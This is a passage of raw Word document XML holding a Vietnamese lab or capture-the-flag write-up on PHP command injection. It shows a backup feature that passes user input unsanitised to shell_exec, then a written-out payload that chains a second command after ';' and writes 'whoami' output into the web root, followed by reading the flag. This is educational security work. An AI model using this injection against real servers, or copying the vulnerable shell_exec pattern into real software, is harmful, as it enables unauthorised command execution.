                <w:iCs/>
              </w:rPr>
              <w:t>'command'</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:t>],$_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'target'</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:t>])){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BDB7266" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t xml:space="preserve">        $command = $_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'command'</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CC0BD39" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t xml:space="preserve">        $target = $_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'target'</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79280B72" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>switch</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:t>($command) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="104C0928" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>case</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"backup"</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="444E206E" w14:textId="77777777" w:rsidR="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
              <w:t>$result = shell_exec(</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"timeout 3 zip /tmp/</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>$target</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> -r /</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5007F702" w14:textId="1762CC8E" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>var/www/html/index.php 2&gt;&amp;1"</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C9BD966" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:t xml:space="preserve"> ($result !== </w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>null</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:t xml:space="preserve"> &amp;&amp; strpos($result, </w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"zip error"</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:t xml:space="preserve">) === </w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61EFF771" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t xml:space="preserve">                    </w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>die</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Backup thành công"</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DF49EA4" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>else</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C76C555" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t xml:space="preserve">                    </w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>die</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Backup không thành công"</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="337D19DB" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>break</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6155C770" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// CHANGELOG: Bảo trì</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32D10E92" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// case "ping":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1928CCAF" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
              <w:t>$result = shell_exec("timeout 10 ping -c 4 $target 2&gt;&amp;1");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D4120A7" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
              <w:t>break;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="568E80A8" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// case "nslookup":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33EA8CA4" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
              <w:t>$result = shell_exec("timeout 10 nslookup $target 2&gt;&amp;1");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="482240BA" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
              <w:t>break;</w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="6519EE8B" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// case "dig":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EE13592" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
              <w:t>$result = shell_exec("timeout 10 dig $target 2&gt;&amp;1");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10D0EB2C" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:tab/>
              <w:t>break;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39DAB540" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003402FD">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16682FEB" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD"/>
          <w:p w14:paraId="360311C7" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ECDDD1B" w14:textId="77777777" w:rsidR="003402FD" w:rsidRPr="003402FD" w:rsidRDefault="003402FD" w:rsidP="003402FD">
            <w:r w:rsidRPr="003402FD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47A70C5B" w14:textId="77777777" w:rsidR="001B7A80" w:rsidRDefault="001B7A80"/>
    <w:p w14:paraId="7FA11943" w14:textId="62877E7A" w:rsidR="0046240F" w:rsidRDefault="0046240F" w:rsidP="00D77034">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0046240F">
        <w:t xml:space="preserve">Level 5 tiếp tục sử dụng chức năng backup với lệnh zip, tương tự như Level 4, </w:t>
      </w:r>
      <w:r>
        <w:t>nhưng nếu như giống nhau thì sao lại chia ra làm 2 bài. Sau đó</w:t>
      </w:r>
      <w:r w:rsidR="00D77034">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mình kiểm tra thêm tệp</w:t>
      </w:r>
      <w:r w:rsidR="000321AC">
        <w:t xml:space="preserve"> docker-</w:t>
      </w:r>
      <w:r w:rsidR="000321AC">
        <w:lastRenderedPageBreak/>
        <w:t>compose.yml thì phát hiện ra rằng bài này không sử dụng internet, do đó kĩ thuật out-of-band không thể thực thi được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FD5F23" w14:textId="3037A213" w:rsidR="0046240F" w:rsidRDefault="0046240F" w:rsidP="0046240F">
      <w:r w:rsidRPr="00BB06E7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61517D01" wp14:editId="6C156B75">
            <wp:extent cx="5731510" cy="1129030"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1881754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54259" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1129030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6437BCA9" w14:textId="77777777" w:rsidR="0009610B" w:rsidRPr="008566A5" w:rsidRDefault="0009610B" w:rsidP="0009610B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF619D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">* Ý tưởng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661F3606" w14:textId="1B4E9C5F" w:rsidR="006A7A3F" w:rsidRPr="006A7A3F" w:rsidRDefault="006A7A3F" w:rsidP="001E489D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Sử dụng kĩ thuật</w:t>
      </w:r>
      <w:r w:rsidRPr="006A7A3F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A7A3F">
        <w:t>chuyển hướng đầu ra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">như đã được </w:t>
      </w:r>
      <w:r w:rsidR="001E489D">
        <w:t>đề cập ở trong bài giảng của portswigger dưới đây:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524B7FB8" w14:textId="77777777" w:rsidR="001E489D" w:rsidRDefault="006A7A3F" w:rsidP="0009610B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000253D3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A829E63" wp14:editId="1CEF6955">
            <wp:extent cx="5730832" cy="1904769"/>
            <wp:effectExtent l="0" t="0" r="3810" b="635"/>
            <wp:docPr id="1512042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42342" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId36"/>
                    <a:srcRect t="2344" b="5604"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1904994"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41948664" w14:textId="31D1A248" w:rsidR="0009610B" w:rsidRPr="00184ED1" w:rsidRDefault="0009610B" w:rsidP="0009610B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184ED1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>* Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F80F31" w14:textId="10CFFD90" w:rsidR="00425110" w:rsidRPr="00425110" w:rsidRDefault="00425110" w:rsidP="00425110">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mình sẽ </w:t>
      </w:r>
      <w:r w:rsidRPr="00425110">
        <w:t>thực hiện khai thác bằng cách chèn lệnh whoami vào tham số đầu vào, kết hợp với toán tử ; để kết thúc lệnh zip hiện tại. Mục tiêu là ghi kết quả thực thi của lệnh whoami vào file whoami.txt nằm trong thư mục /var/www/html, từ đó có thể truy cập trực tiếp qua trình duyệt để xác nhận lệnh đã được thực thi thành công.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload được sử dụng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA8A6D6" w14:textId="677BAA69" w:rsidR="003D7D48" w:rsidRDefault="003D7D48">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D7D48">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test.zip -r /var/www/html/index.php 2&gt;&amp;1; whoami &gt; /var/www/html/whoami.txt ||</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B997B17" w14:textId="37617733" w:rsidR="000253D3" w:rsidRPr="00E71537" w:rsidRDefault="000253D3"/>
    <w:p w14:paraId="19F8FA6C" w14:textId="5BEE84F4" w:rsidR="003D7D48" w:rsidRDefault="003D7D48">
      <w:r w:rsidRPr="003D7D48">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="686F61D9" wp14:editId="3B256B74">
            <wp:extent cx="5728427" cy="810029"/>
            <wp:effectExtent l="0" t="0" r="5715" b="9525"/>
            <wp:docPr id="1770933750" name="Picture 1" descr="A black and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33750" name="Picture 1" descr="A black and white box&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId37"/>
                    <a:srcRect t="5159" b="8661"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="810465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B58D44" w14:textId="440AAF5A" w:rsidR="00425110" w:rsidRPr="00425110" w:rsidRDefault="00425110">
      <w:r>
        <w:t>Truy cập vào trực tiếp vào file whoami.txt và đã thành công lấy được kết quẩ lệnh whoami:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E72BC1F" w14:textId="27A8B281" w:rsidR="00152C8C" w:rsidRDefault="003D7D48">
      <w:r w:rsidRPr="003D7D48">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A617A13" wp14:editId="7637C182">
            <wp:extent cx="5731510" cy="471054"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="9416251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25120" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId38"/>
                    <a:srcRect b="42000"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="471054"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD3976A" w14:textId="607BC78A" w:rsidR="00152C8C" w:rsidRPr="00152C8C" w:rsidRDefault="00152C8C">
      <w:r>
        <w:t>Thực hiện đọc file flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C874860" w14:textId="0DD4C36D" w:rsidR="00E71537" w:rsidRDefault="00D252C6">
      <w:r w:rsidRPr="00D252C6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CFF3DBE" wp14:editId="471CEAF3">
            <wp:extent cx="5731510" cy="511175"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="51944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43971" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="511175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="045AB8DC" w14:textId="729C2D8C" w:rsidR="00152C8C" w:rsidRPr="00FF23DE" w:rsidRDefault="00152C8C" w:rsidP="006C2EE6">
      <w:pPr>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6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27728A38" w14:textId="77777777" w:rsidR="00152C8C" w:rsidRPr="00FF23DE" w:rsidRDefault="00152C8C" w:rsidP="00152C8C">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566"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D32F54" w:rsidRPr="00D32F54" w14:paraId="742158B0" w14:textId="77777777" w:rsidTr="0098336C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00DFD9CF" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="0098336C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D32F54">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26B38463" w14:textId="77777777" w:rsidR="00D32F54" w:rsidRPr="00D32F54" w:rsidRDefault="00D32F54" w:rsidP="00D32F54">
            <w:r w:rsidRPr="00D32F54">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
